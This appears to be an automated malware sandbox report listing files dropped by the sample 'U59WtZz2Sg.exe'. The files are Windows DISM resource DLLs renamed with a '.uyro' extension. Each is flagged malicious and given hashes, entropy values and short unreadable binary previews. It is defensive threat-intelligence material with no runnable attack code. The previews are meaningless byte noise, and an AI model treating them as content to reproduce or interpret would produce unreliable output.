Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2674494
Entropy (8bit):	6.684916097994651
Encrypted:	false
SSDEEP:	49152:A3R1lRf+yAHLvThf0we+9fPF0RkBOETd4rR:MbbAHPFDp4N
MD5:	2854245555F8FED5E73205400AA04C66
SHA1:	2804A09479BE885EDA2FB7EDD2B04A4B91CBEDE1
SHA-256:	7C5B4095413DC1873F0CA49CBFC46D67124EFAF6AB14B8B13C28C46ED7FD3D23
SHA-512:	28B738D5A5F93FDBC6FE29EF9276997220B1B2CDC1410E073307464D2970485FE66713C6440F8EE68DCECBE94EE94025EE8B4DF11A32DA56150A7AB4356FC969
Malicious:	true
Reputation:	unknown
Preview:	MZx.......OZ. .......n..W...X/a<.......`.?..J)..?..z..v.n..^.ZN............C..j\.Ek..t$F..Y.&r} .......2".....;..PE..O......R.i7x.^...B^W:..is.O..h4~%7.[C.......W.....!.ys...SP..K...q)+.......oz.j..+V3y ]b.........z...+C.<.4n...2.`+9.k..H.>.......d.).....u....M.>p._Mb..>)>.nh......W.a6$...c>.`_W...........4...F"........T..K].3^\|'F(}.5..go.E6+vb.6a.....j.#..=.'........=.x...b..J.@ .#d.~..U.f...y!.o......l...u..6kcH......M....L...VR..ZR.W,.{.ktp~.........E......&.....Y>xfA...#.R... .+....tZ+..5;K.!.Lix..d..'.GZ....\|.,.tgl..8..0....z\H..w.D:..I.....+H.g'.c.....BA9...b...,.W6z.....X...8q..........].E.P....m.4l...u......q...3....1x.....&...[5...&..Z..'..8.K.J.......O>.Y..\.w.I0L.M..QVj....~..Wj.m.)rw...Y.\6$(t.........{.H......2.mJ...].0{.%..l...N...'......{l..........G}.,a..j..59...X.z@x.\Y..j..6. .,F.E....j.c..8..T.(....O/j..0...+..l..u..)..M..r..x..q/1%8.2....,.}.g.....J..j<.......[.2..A.......<R.7.I;3.4.6E.......

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	144390
Entropy (8bit):	7.9987398031502215
Encrypted:	true
SSDEEP:	3072:62J/GkQWfSI28HllE1GTr/XN4tAdCC+zfhsVQtoR:BJekQWfSXQlE261zfhsxR
MD5:	441B267077DC0310B60682BDC6D09809
SHA1:	9C94D2E68F7DEFB8A0A1AC22FCA85DBA9C962C9B
SHA-256:	EDDB1D46A8E707B146038AD9321BCFE0622274B9C9198AA7A5286A1D2A19BB98
SHA-512:	1B173BA0CE36C3DE165D8001FDC12FD8FB9166559786B53B50AEAF6678C503F14E91FFC9A9A1B5BA7B36B7FEEA16E3BF04FB29BB05FA7340ED8206F4E335B187
Malicious:	true
Reputation:	unknown
Preview:	MZ...r2..?Zw.c.eSu.(.,p!(LAC.t..`P...\.U..o..o...&g=....KL..;....^.l.f=.z.T!..^+.....W.7.1...!...o....o?qF......!>..,.."FV.Jc..C...u......o.0.O....a.}H.../..r.#.s.......b.R..p....!.... ..C[..{....`..e.(..I.vCkr...O.......>p?.:.S......T.2.k..\w.6..U......7.lm.R../r@...q...&.W....9.@3u{.n..N...G..m....,~.K....B...._#...G.....<7x..T.^..kSW..A..j....k.M.W..E.c...`..)..85..`...8..).W..O..../...#].O.Kr.A.0..5.gI........*..$....QY... .3.........U...U7Uv.47.Gp..T.z..7.+...n...7.L.N..F...O.c....._..P.K.?.~+...hsq.(?..-9%..... h..2..5@._S+C.1.y?.iw.g...u#....<....m=..{e.I.o..........T.t...>..'.o..'.i..6dG ...=j..R..!\...9..@.K..I..3......$O.PS2L`G....o.#.%A..D....{..rOz.fG.....R....Z(.w...G.%..O.G1)L"l@Y.c`...N.C.kABS..H...Wqz...yKT.,..9.p.;..r...L.I..~:...h....y:L.Q7.Q9[.c.L .<..l....]:...9...R.......w.....9...)J$..m8...=.J..d.l...w.vcA.@A3.X...........e.]1..........k+Q......\|....h.... .r.e.....X.r< ......a..Y..c.@....(......z2-.#%.E%

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	18766
Entropy (8bit):	7.990134034584143
Encrypted:	true
SSDEEP:	384:wkNnbONeOumu+hPWPtjxbu5jSE3Ukjk4daVosFImiysbq7SmLQyApIA:RBSIqh+XbaWEf44gIrofLQBpIA
MD5:	81750D6C89098F13F1E7E9E1A2440711
SHA1:	52AB43E2478EC79FA38E541D198F2F15BEF5E625
SHA-256:	13A3C954B7C101F6794A3111E097B3DF7A5E4F3648E32952C1B62986F4C7CCA5
SHA-512:	47E9B686AC909AA13B77B11B7491CBE758CA30B38DC8AB5FB970CCCFB185A57C175E36FE08381874644052A90BC0240960B37C9162FADFB29817CC4D19BE5026
Malicious:	true
Reputation:	unknown
Preview:	MZ...D..r.~.Xi......A..~<..U.tw.a.P...P.pq.....L5.4G..b..} SS..j-.......F.fC#..t.J.x....T-....CdI:...cz...q.q..x.=`.#1j......\|._[.H..t.....{..t.>p.j.xvzW./....[.~.H.'...Bx..C.j2.0..2..G..._[y..H.8.<../4.2].t.s...>C..I[H..K2..,2..NR.....F..@.d../.....+.#.......#N..9NT..!..Bj.'%..y..T.....v...x#.....:#..g..m.E].=y.......6..... gM1...UL....).........D.`.R...]..X...bd.p..2......]1........C...t/..p...{.....`...;.X....w.._..6,.1M..N..&!#.h:\.......(.\/....b....v..A.\|q...h4<:oL=..I.-.q..=hf...bd..Dy.z..A&.e}.P..".."Y\.V........~.....e.A....x.7B......QR....c..P....gNPK:.-..~.yU5..6$).h...%_Y...........814....A......g....0..8Y..5......H..$G.U.... ...=.....4......q...9.r.].......2X.C..~.oq....i.PA{'......Jsy5.......EO...I.....L#./...}.$........=.=...*.../.c{W<.#..2....I...>..I..r-.[..]LC..=..g.].J...7-..'..@..g!.C.mSm`l....B/._......U)?MdOAG.(.Z;..(.].\k`!f..wv..L...[^..q0....;7..M..+...Z....t.p..c.l..........7....H(...=..X..$..^.\|./..!P

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979272146885903
Encrypted:	false
SSDEEP:	192:OMl/ltOWYiUl3qvE3bpHSw54foKLIZguKm7hCHpP:OKtMF1aE3I3hsZpKShupP
MD5:	495BE6637A9EA7794BA5940952082A04
SHA1:	0BE7416B24C902E449685E440DD19732CD6B3827
SHA-256:	B0CD5876D0D6C151920423F4A15CE89BF0B2EA41B4331DDFBFCE956A9EA76070
SHA-512:	5AAA0AF6CD2592AAA9FB48E252E5F091D490DD2F282ED9FB458FC5E1E36DF7ED7D322D7FC16A97FAEB2B5C9FBA52C94F497824E608E260DC9157B3893C5B6C3D
Malicious:	true
Reputation:	unknown
Preview:	MZ...........N.U..Tv5..?...g.W3a..h.g.s...e...L.)...t.z.v=......SQe."v.>...:...T7.^h..3=.{uuh."..tN.z).c.9..r<.;v>....Zb.0'..2n.......C..8.y.9c.#c...J..S..(u.....2....G..m.\.H.T.@....[9..N..L...XZ....1..S...$.e..J..%nb...C9.b..........7..yJ..#o.M.q..y.x 0..l.....t.c..cn/....B...Z..j...I..O`.6X0.w,.. ......O....4".]W.)......V..9\.+^6.G.0....MI..T]J...#=tH.ny..E...&.Ul..sj."4n.W.:f...F...=.\|..'...2.K..?..6.I.mMC.uo.3\G.O.p...9$.&.J;`...wC..9r)~......7.2.v.[.6B.....ez..)z...l.U...>.#..4v5...d{Xfa.\|......k....W.&..j...G....b..^>.&.".a.>.k....o7@......x{.....#J.m..!,9.wW...n.J./hO......{..7UM.[..jM.%..B..@&^B..(.. ...IQ~.2G.%%..}..9. E...5....I.....].......t..6-.r...Bo.y..,$5G5.....e.......d......\b.k..~N.L..Dh..:.0.{o@o...@/. ._.\|.o...].'.....ha.U.d.}..7..].m...A.Lt.C..2n.......;xWo3v....Lz(_.Y.....$[?..c.lj..R.4e...F....}h..k.......U.v..J...i....a<..p.-U....Y..+.8.g.D.....<./D.,Q.....D..P.N..tg.huU.. ...[_......J....]P..<gE/.>u{...

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	51534
Entropy (8bit):	7.995881398209108
Encrypted:	true
SSDEEP:	768:eN8vyZflOaTNYtSZY5InOGtMAQvly1g/Cd5/t3DZNY8adsubOAqsAOlcPgipmxdA:eyEcaTNCS1gKNbY/iu8jjmnA
MD5:	6771C89CBC97B9C01ECAF346ED5775F4
SHA1:	48DEDEF8D30DFC108CE54CBB44F2D3674EAA5608
SHA-256:	991D32E33301F225629B680F809F3EEAD84E674552D5A0157997A319FDD5AD23
SHA-512:	DDACACF115DC64A05819D4B0B17DDC469DEF3B75F53994293A123B80A2060254B830BB92B545E7FA28A93849AFDC3ECFB748103C04C6AC31EC34C37C05F96087
Malicious:	true
Reputation:	unknown
Preview:	MZ....MI\|.}.~/`..E[...$.;.s...].)....S.).../.#VT....+...M..a....+r.T8......=sP.v$......xy..}&....J..-i...=q.bW..8.b.(.;..`fy......~.y..o....o.^#T.]....4! ].a...,.....W.Q.~L..PG..uZ.W..... N._R.i+..\b.[h..v..A...h...m;.ji3.........<-~.4..]=.~..(A..~.I.:..1.....>.#.iJ.M.....]je.9.g/U9.m<).'6.....h.+.D....r2\|.6.`J..F..{..I.U.f.l~3....e..W..Q...B/b.?..M.se/}.e...n>#.."G..../\...@.]rOeu.yFSi6;...{..T:..8..I2......7..`#fpC...b...Q.ez...7-...U.d...g.&j...WUK2\..:.........\L.......k<..Cj..!...I^G#....1../H.V(S(...G$".=.+.o:.(G..P..F#R....>FR...U_\|.?..@.">;.M.^....F\|S.Q.~.[!...r...B..K......;...7.f.....d7.N.#.73./.z(LQE...#.j.;M..Q@...k+.$9....1,..._.I...-O"F..$.....={w.7.O"N.Cy.kUS..G......9U'....r..Y.....k......h. ..5.lJ`V.R9..b...'..)R...!z..eP.h.F..t.X...CN.s.....t.N@.\.GN.x&u...U^..Bd.P..N..c...5.O.[....8..u...q..9.V...;..#y..o.B..7.S.r.v....h..6...a.....>.j...gy..0c..p+..1.U..n.. .p...4i..]2.-....D@.0..G.fN."c.......v...z..PnI..&..U.~.F...\|..

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	13134
Entropy (8bit):	7.985316289461209
Encrypted:	false
SSDEEP:	384:jBmFVHGroxreMMCW5djGDdTYI9o66XNR+Q/2TYH:jB9oxyMAdj6EpT0MH
MD5:	992AE3CA2AACFC9BC1CE633DB9DB0745
SHA1:	B303D418248DD8C39914CF1586E6767B201F569F
SHA-256:	20321403F6A2FE35996A0EDF81766631E7476630B911DDE96E71DF9EB6325544
SHA-512:	9BE21161F1CED47C73B3778448CB82FB290D70E1C12245D0DAAB014A523EAE6998EBB2CD3D8122D7EAC74BDBEB20C7F315DF301A4B16111F27F3B8925E9600D7
Malicious:	true
Reputation:	unknown
Preview:	MZ....m..qNW ..I.....'5$..(.-g..t9.c.n.~.u1.0.;k..6.8..i.V"...q..4.U...^M\.[!H.>C.T..5...j...'T\|$....3"..-$...L....N0.=(....9R8.r<h\|C..._...q.N..6...9.....j.a_..g]..PqT...s...%qSe...D.c.......#qa.7....jNEf.....Q.D..vysU%.O.. .@.g..7v..E.<...._"2e....8..".-...O(....,.;.ax....@....>....^....^..A.a.a.K.R<......V...2>4b.&..{...n..;..k.#T..9c:'.q0......."~.p1...c...j.'8#O..9I.z...{.A...C.[1.....R......h....F.!.x.Q1....r......j..DKl......9..z6+..6.y...C..m .....2..........O.._..E......>.q.zK....u....8#)\|m..?........'...U7N.FU...\|oL../..-........cZe.t.}..S..}.rc....7....#..j....#.S..e.0Dk..qQ@ae...8nF.....Lzw>a(.)'X].ah.w..b...8.mL...f.L............xk..?3.\|a.XAW....r....AI.(...H....^..p.;...f.......-+.{e....otY........2k......{............?......J.7.:...d.j...L.h..Q....YH.k..I..yE.........D.f...?.]..xe...9.&=..6e...0.]a.....'. ....7.8..^d.....h.j5b]\..e.)c..5..q.......B.\.t..E..0...\..d1..D...f....9..U../U....y.3.....9.....Hk;..J...b=

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	8014
Entropy (8bit):	7.975948198311155
Encrypted:	false
SSDEEP:	192:VVfFwjlKYxFGKT4+TMmpLf+MJZhIf08ZR1zBvFv:7fFwjRT3TMs6MHI04t1B
MD5:	04671575AF0D634721A5FA9C2FFBAB7A
SHA1:	66D0303B35438530BB1CB80A4ABDCF25E67E263B
SHA-256:	83E17ED507ECE62D9FF2CE1E98687E1BC189963CB8011020ED923F1D30189F2F
SHA-512:	6C1915B71EBD1E47228FDD7E576A1DBE936365EC1684EB7E00DE8CE0FA109A1EE52DB4B8BFF51C6C8328995C7B439CA07885914596794E033AD03D124AD4FCC8
Malicious:	true
Reputation:	unknown
Preview:	MZ.............B....V..)DE+...o...5...B....@A.......)W.#.1+H..`...qZ...8g.c..X..........>.Lp}.e....Qf.BY..?.....Y0.9.....x..m....W......v\|U..E....,&...-......Q.Hxh.........#.Qb.41.O..4.c..R.n.5K.../...@">@.....2...6.Wy.V....f....u..Q..u...g.!.....n.^&/..%M.....\'.Bd.&..Cq.RM..R#@.1t..v...-..X.........a..^g..}x..Q.z.2.b.......~.I=3...\..}R.U.Rz.....V...\.k.3..0.......D..P.P..?.W........?.{9........$J.J=....B5....F...BN.X...7K2....uFN+..z`.&._.u.th.-......wd.I.^\m..)o...]e..4e.7...y.h/...-L..._a.....HD.;...i.9B.K..J..R......R...Ty?A.). Q......jo.....u.v.K.]D.J.B...../XP..b..)O.>3A....[.!Nz..S.&...F.D.,/.m...$9..+.......^o$2.Is..JRb.($u[....o.D."..(.RN.c.;...{F..8....I.l..n...P.}...[.I..\|q.Q...G..{.7=#+zFO..I..%......\.......H..F.c..... ..Qs[O{..v.8.+z.kDj...}.....n1..W..w&vF.a..d..Pp.@p.m...x.d....l{L.A..>.Z.j.S..DfW-....dy........a.0..A{...-.i.W.;.w$<.v.XH...b..;...].Z){..j....m.....t...$s...7..#.l%g.M.5..j.%:Z..~D3..R....)....R.&a..

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2894
Entropy (8bit):	7.940976197399187
Encrypted:	false
SSDEEP:	48:7wxWxubim63s+AhO01Yeg3tX1+610SXPr+hCfpPRllKdZE1hI0XLX/fiTcl29sIk:7wt+e+AhO28X1+i6hIR/b1/XLCG2Kv
MD5:	551B4FDB07F35C6E28DA64D03B9CE9D3
SHA1:	DE41017494CA2739DF6EF4DE3463EB4A284EDDA3
SHA-256:	547F9F064C99C356ABB154F070FC19F4187AD2853B434BB4C94A8E0B02BA3A7F
SHA-512:	EC739BD008E2C713566052B427C3512B556BCBA7D3214786E0C2394F04F075E75E0751FDB746A55AA02477F85482EFE4970B5D2F8CA8095C44CF9FA1BCB1644B
Malicious:	true
Reputation:	unknown
Preview:	MZ.....e.`5..O...G.&...`5@p0O.L.9.S8V%0EI....(......8.^Eo..x....f..].....;.\|..S.&./.?....9...:.u\.Wc9..-.c.9Po.~...KV...t2....kO..._3..1Q.......P_.....Z]b..<O.3,xN.'.m7.(..ln.w..E....cU`.......F..'......<.......C.J..5.e...@..J?t.p....y.?...H...??.".(..&r..D.(.0....@.a.t<Zd..l......].w1.Y...<.....L;..r....X0'8../(-..U.%....H.6'V0....h.I......~8.JhLY.d..m..I.../..\| .V.CKUf.&.$....N..........Z.$<W.....}.@a.:.{\|C}..!R._.A.q.3...o...v..K.".ub.c..5b.E.mf....Q.vX.rA....%.3Z..m.E....7..f~F5..Ga.In@.Kl.?..J......I...v6.l......X.v.-.fD...9!.L.3B8f.-.@.?_m.U..:.Q.^...D..I.....#3.d..u.Anu....[..Aq..2H...M...RQ=..A..v..-..!..Y...D.....o......HZ..f.J...f.ca...WS.>.=Wr8n.Tt...l.C..6@0....7.;4C....uD.......\.5Wxm....y.3....5q....{.._.K...P<........l.i..-.9.....bv.P..Y2.......b\|o...I..)l(..`..&...@&..(.#...b..w....[.Ll...d.UV%.`.l.t.S'.9P..u..B.l.&./......C.....E....}.k0.8=m!...."3...3..7.R<....^B....a.a.....B./%.....%..F.C..... ..3..PG..gc.sx

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	18254
Entropy (8bit):	7.990156680036601
Encrypted:	true
SSDEEP:	384:9RKH4NUbC603IyHUGdUhajAhaUhzkoQGOHn4u1aCxAnCitH6i:pxvIZqUhvaNaOYGaQ4XR
MD5:	501D0BF8B67E13D5AD5B532564E1EB03
SHA1:	2A12558D7AB8D43AFEBA28EB4F7D8EC37C3A8985
SHA-256:	48E31450CF57C584C09E174BB5CD7FDE711A21DE0EE75F531F3F1DEC895FC168
SHA-512:	FEFD29D6CDBF231E7256BF77D061B595C5E1331148D3EA5BF282C417842501BFEC2C2B6338C00C1236C5C9CBAA24EDA50A47CA6BA1DB3ED83B31668DE772DCB2
Malicious:	true
Reputation:	unknown
Preview:	MZ...$i.=./_........N.m...hs......N.0...0..f..ze.H.~..,..r2w.W.]\|C..(xO}...O!.\|......pX).6..b......@..#X.K07.L...{.HO.:.2...$.Mm....=..Z..m.].#..].....p.mx...@.....e.............`....j.8.Q...._...!wO.T....e....1qT.`..tk'L}.. ......[.r&5...d.j.....C+e....q..1.;..U.+.I.OX..N..b'....._I{l.V".....qp...;.h.B......9.xE.V.l.KP2.9.....m.....e..g.B.;.._.].)J^7..vS.t..z..7..+....L.Z...w...=.."...F..%.x...7.q.D.d..<.Ze.........V..R.S..Q&..\|..w./.'\|..`....E.Z?.yl.T.rp..Q-..c[WS.;.E..W!....l.z..q.e....1....[..z\|.....w.#g.a9P..o.HG.K:L..>......3=!..B.XT....K.OH.=R..5..........S.\...\7.F..M.\....a....D.Y.."...NP.,.L..i.....#$.....\1>V{..^..R...Y.z.\|.C...zP(.~..-2.P.4Zs.N...o..P.G .i7Q.-D.NT1..W!..h;UCW....\..<O8...::Td.......P,sK.s...(..:b.~..V..&!,....Nc./...e1....:..!..K..b.bT>nj.=8.O.~.l5.=...K.f.vE.....3..>r..V.,Et....@2.. !rU.t.....Y....~zK..{2....[...,....L...{..s.q.SO..5....>.....sN.q..L..+.I.\....-...l<......{...../.H......5..kHb"....;o.-$}_.

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	9038
Entropy (8bit):	7.977155548861648
Encrypted:	false
SSDEEP:	192:f+ecJzg1r0oQguSWdx/3I3vl8HoqY6TjyhLQK+U:Dc0rnu7j/3I/leoqYYALXP
MD5:	C46D5D2D2522C03BEA9E455C141D726D
SHA1:	F967CA1483E421EA022C913277C05708CF24F45B
SHA-256:	E39231C7F7194CFD2FE62D6C32054DA85F550723FCF2958E6FC421FFC5E1A0C6
SHA-512:	D0CF948ADD2F19EF31CA6496CAF08564C71AD5838FBA7DEC6ECA012CC2080F8517296DD5E1480F7D2B6A9D59C86B40F7B474D3AA9ECA5C7C2E48B4BE121B3372
Malicious:	true
Reputation:	unknown
Preview:	MZ...<...R....0...@:...i..41~q5...:..{......&.#...A.<.j8..J............qB.g..nM...+Eyj..# .-A........y...Z..........\|....c.;..aOh..."....T..,..J.s...\.c...Ni3.....>....2....$.CXm..W.......W8.K....&......q..(...%..l.y...l....s.vR^.-.........c%.x!....PU......u\.........:...V....3..h.Y.$ -...k\)..d....4>...1[...Jz...c.[{/.,'....;..a.....>(.$D_>.R..S..,.(..C.A....L.iuX.M.;....FY...G.\&.Y!...w"..X.n...6...yzmnq..G}.J,..6....].......['.UR[......ps.y.&......X.....$2....c.M..........X......<v..\~\|m.ud...T.4....O 7b$F..<....`[.zd.`....%j.xu.dJ..i......nY}2u?<...p.fl.0nX.......?.]...m.<.\|..i........E..1B.Z..o.../R..5..5.....df.y.I..'yI.[\|C.D'_......k.....6..0N...". ..+-.y......P..}..U.>Q.3.]....Q.Y>..j...'.zo{..n1....n.K...VR..%Y.CL..i.......5...ra.W_..U....?...6..'......Q..L.g.d...h.>.c..I...Q."5...E..R..D.3r.3..1U._..,......p...p..,....)..a{...i..+.Q....ct...g/..h ......k...B[X.Y......T...$..E.-..'D..F.x.G;.@...3..:.mEy.7......

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	2894
Entropy (8bit):	7.9427192508521145
Encrypted:	false
SSDEEP:	48:E9b0EYeAlOvo+JKHvLMOJ7Peh/iFl2CLNqN9FJr+fsSkB8ozU7oOYMACcqfZjRHL:Eh5iOvjJ4vLMOJ7mq7LNg9z+fsSq1UpD
MD5:	B36DCD3198CDF28EC41BBEB3DFBF05F6
SHA1:	090B3E68A776870AD34401E295295406A348B73B
SHA-256:	5C932B913F08CA4EC28A2742AF63B8638E6D33B363ACA3A7FCA3942AC292B5B9
SHA-512:	6D65E7E13B51B144A8A1512740D9BB2FC365E032A855AAB17CFF9416C11ADA75051B2AF3B680DBDFDA1F751120B272ABE2370D961D2340A4B0E0B429301EE8C9
Malicious:	true
Reputation:	unknown
Preview:	MZ.....[. kY.[.&d..;+.gq/AF..k.U..u...l.....F.-.TpR.=%.O.W.ec(.<..2.~.=......C..v..lf[X....".....M..>l..Z.=d....M.LdB>Y...G..~]..}..j.f.d7..>.;Zt<.-..v}...G.OH;3.'h.....b?.%c{......m.q.. 9w.r....r6.[,?.\..Y.`.f..L../e.....t....z".LS[.V..t..n\|.....[.^$..3...j......o.pJ@.ZT...{K..P,..G^o#.55r.O...V..v..s.I........'....+..[..x....Ah.....~~..jf.h.[.Q.Ep0g......d....=Ia;.>..../uw...}..#H..:..&0....mQ.....,.#..\|....~"e...z..JI.....[.Ac...g.X..#...(...(N.K...e.+........Z.x.]...Y.lG.4[.....x...KvM7h...C..!N.....uA.~AO.....6......1+.>.N.EM.....+.I...8..5{8k...yy_././Q..ZgL.......V.[...H.MjT..0AL;...8.H....c"..q(.....GZ>@.I.ax...6..5.5..]R.....n{....^.m.zLES7...qr!....1.P.....e0]2...5.93...S..L...0..M.{.?0...d.$zo0..\.[`:.R.?..c.S..;l.57Ys8//Uf.h.j+.2..+......O_..+...L...Uij....h5u..i.S..m.......9];v..j...I..b>.c..~.....O)k...+..M.0.9..`Q.\..........=Ki.?...."r..}.U....}...".2....V...^.).....&~[...N.cp.....mY.,./..C...SO....K........R

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	3406
Entropy (8bit):	7.934033064368654
Encrypted:	false
SSDEEP:	96:MG8mu3S4DjWFGWyuIm++gZwpsbQF/lmYphOOCCcoM:Omu76ka8wpsb8lx47Cs
MD5:	612394FAAD42F392FEF7973D3B9B57C5
SHA1:	A667A1DCC7C69488AAAF231DC043CBA1B91966C9
SHA-256:	D86FA2A4C7901142E3B05F9665BBC60F7B1F8C46586C8C3399955014985714E8
SHA-512:	612B6FAF264A31E8B4DC0914AF83183C110DD3D0C7FE0D8F65FB194AA4DF67942999067692DCD77022921E001C14F0E39B4E7CB7E683E98BB525AD50840F19B6
Malicious:	true
Reputation:	unknown
Preview:	MZ...9.._.I....p..M_N.MN.t..=....x..c(u....}[.Lu.........E............H.g..t.@.f.+@..)..C....!......?nm....s..e&..6~F.\..+w;p....3....h_..:...E<T...SIL.BL.........k.T.......s.r.'m...J`.".:..~<.:w..E6.K.J.......b....?.g.U......-.)......p..c.{.V...My...{Z..gcp.x#...k5}...P<r..mb..no.k.~(..H.5.B.B..V..;14./.....L...CU.tjs6b.73rv....T..R.....m.x..=..^3f.[..ImV"c$E..[. ./$.B.D....J..\oa..1..39.y.t.......WW\|N.....i.+K.Q/....\.R.M.iXU.......P.......C]V..3.+~..Ym....<.$.Mp.q..Y.....AD..m!.........!..+B. m.'>.Bxk..Py.7=.ME.}...=xJie.....:g.s.m...;p....[S.....:.../...[t...?...7.K:!p...6..H.g.EN....l..$..q&6l.DO.%w7.@.~y...P.....GO.d<.Y{.Q.2Q..A8.}.S...F&..X.B.T=...7O............s.).&.~b..c..hg29.8.tp.H.V_x....}...x....M.....T...LH@.r\|.J.....c+b..v-...E...'..2X.C....l..5.N.....jMH..%......Hf'\|.m...qR%.U....J...........2(.2h...<.D.O<$}..0X.}...$.-z.._...o....d..w..#.%2."Vs...y4"{./..1....<.9t&r..,.4.{.P..p.S+^..'F..}......9.FE.?.<...b..']W....

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2894
Entropy (8bit):	7.928553021628026
Encrypted:	false
SSDEEP:	48:1J58ikZtOmxHcX2TAq4oliWt6cFK2FUJ/iv5nF908jWuvbRi9bqiqAv0dhcW4D:LelxHcSz7t6cFjAuJ08quvbRMqevGdk
MD5:	FE5154DB5AD9B3DE89CC28F597B2A000
SHA1:	BD03ECD948C033FE5A07C7ADC86FF9A6E969CC89
SHA-256:	60E6EAB8623F1B8D2770B261218EA57DACA78372BCC1C7A409CF16DC3F4FC8CE
SHA-512:	DE2EA02442E967619774486B1AF78D0EC45F48BADB237E56ECD5468D9C8882F248AA6F9E0E054D894B7607EC1956C0062A3EC245C00C4DB9124F46838F0F0DE7
Malicious:	true
Reputation:	unknown
Preview:	MZ.....z..X ....e.h.X..f{..t...reN.....P..fb...P...Q.....Ml...%.s..Y+.......=..@z....C.J`"...,e.R..m.Wmv..M.h.i...P..........._...[{...4G<..x.@.....3..b.....ae...!.p..\|.....jT.cv..Z.Q..!._"..... {r..5 ....j..}V.k.S9B...4.7 ..b.&".3...d<..e4{{.x...nVj8AR......&......NXC....Ux#..r3.FE.%...p..`!......h.i..!...X....=).nh...Mc...^...5!.y0..&.ag.1.....1....~...$.tj....{..$s. ..3...Ey)b..S..vN.Y.J........9\|o@..O...qt.i...A.+.....(....^.....6...\|..1.N.[k.A........?.^dlR.}..m%..~..Ho....^v......~.Hq..!X....=....$.g.4B.KX..~.l.~R.B.ekF\...ol..pH........8.z....!..E..4....GU!AS.f..O_k.._...6.;.....\|...W...PJ..I......Z.=r..RSt.%9a....C..dp.0.....``Jg&&.WY}./.g...4.......Vp.2.h..>.UD..S+J}..T_./.~.oR.quI.e.R.R3.I..7.M........V.z...SO\.&n..4.sq..eI\..9..$`nm[y.I......[..-..J..A..e...N...YD_\|>......C.......Z..2...;b...}....>1.<L.&..M9.je...0.Z.C.C;.aX.m;=.c.k3X....~.ML.?.&]^...^..}r..Y....c....Gk.Npi.........-.!..l@........:)('.3...d...1.%.7 .Y(...&@`...N-

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	18766
Entropy (8bit):	7.98978429702636
Encrypted:	false
SSDEEP:	384:jzuGTfyRlhPzxMVYxOAYCaOwPm0Qr+rb1OA7Ubw6q+PoxJ2+K:3EPzqVYkAYHOwPrT5BZ6qSsK
MD5:	A17C3F470D5DC712F589E3663A96EF3B
SHA1:	6A20F30E020BC44D2954FA63817BCB57C1F20AF2
SHA-256:	C20C9C0EA8D143DA883D95EDA925AD5B842CC7AEDE16EAC7AA39BA9C371B39E6
SHA-512:	5A93151BC773A91E782A277C1EA7D264A8C829C9BE90FAA4D25225494CDC1F696148B133DF2012BD0C47C0CEBB0AB880C5FC75EC3D0FF6BBAE1ED27890217C09
Malicious:	true
Reputation:	unknown
